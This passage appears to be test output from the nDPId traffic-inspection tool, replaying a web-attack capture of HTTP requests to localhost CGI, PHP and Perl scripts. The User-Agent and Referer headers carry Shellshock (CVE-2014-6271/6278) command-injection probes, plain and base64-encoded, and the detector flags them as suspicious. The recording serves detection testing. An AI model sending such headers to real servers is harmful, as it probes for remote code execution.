{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277417,"pkt":"AAAAAAAAAAAAAAAACABFAAEKMxlAAEAGCNN\/AAABfwAAAcU2H5CRJgvewUykPIAYAED+\/gAAAQEICp1m\/dGdZv3RR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277419,"pkt":"AAAAAAAAAAAAAAAACABFAAEJrmtAAEAGjYF\/AAABfwAAAcU4H5CXuZakZnwUBoAYAED+\/QAAAQEICp1m\/dOdZv3TR0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} 
-01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277420,"pkt":"AAAAAAAAAAAAAAAACABFAAEJZRVAAEAG1td\/AAABfwAAAcU6H5C6AV3ZPf\/xToAYAED+\/QAAAQEICp1m\/dSdZv3UR0VUIC9pbmZvLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277422,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0gtAAEAGaeJ\/AAABfwAAAcU8H5DcN+rDzEDc2oAYAED+\/AAAAQEICp1m\/dadZv3WR0VUIC9pbmZvLnNoIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277423,"pkt":"AAAAAAAAAAAAAAAACABFAAENVqhAAEAG5UB\/AAABfwAAAcU+H5CeOW5utt+cAoAYAED\/AQAAAQEICp1m\/dedZv3XR0VUIC9sb2FkcGFnZS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277425,"pkt":"AAAAAAAAAAAAAAAACABFAAEKJkVAAEAGFad\/AAABfwAAAcVAH5DPeB6QOQhEGoAYAED+\/gAAAQEICp1m\/didZv3YR0VUIC9sb2dpbi5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277426,"pkt":"AAAAAAAAAAAAAAAACABFAAEKG0lAAEAGIKN\/AAABfwAAAcVCH5Dr2SOM+8VpkIAYAED+\/gAAAQEICp1m\/dqdZv3aR0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277428,"pkt":"AAAAAAAAAAAAAAAACABFAAEJsHVAAEAGi3d\/AAABfwAAAcVEH5DgV4i\/xF\/y64AYAED+\/QAAAQEICp1m\/dydZv3cR0VUIC9sb2dpbi5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} 
-01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277429,"pkt":"AAAAAAAAAAAAAAAACABFAAEMTIBAAEAG72l\/AAABfwAAAcVGH5AiwXS0u+SpZoAYAED\/AAAAAQEICp1m\/d2dZv3dR0VUIC9wYXRodGVzdC5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1576420277431,"pkt":"AAAAAAAAAAAAAAAACABFAAEE5XFAAEAGVoB\/AAABfwAAAcVIH5CqQt2jzObFZYAYAED++AAAAQEICp1m\/d+dZv3eR0VUIC9waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
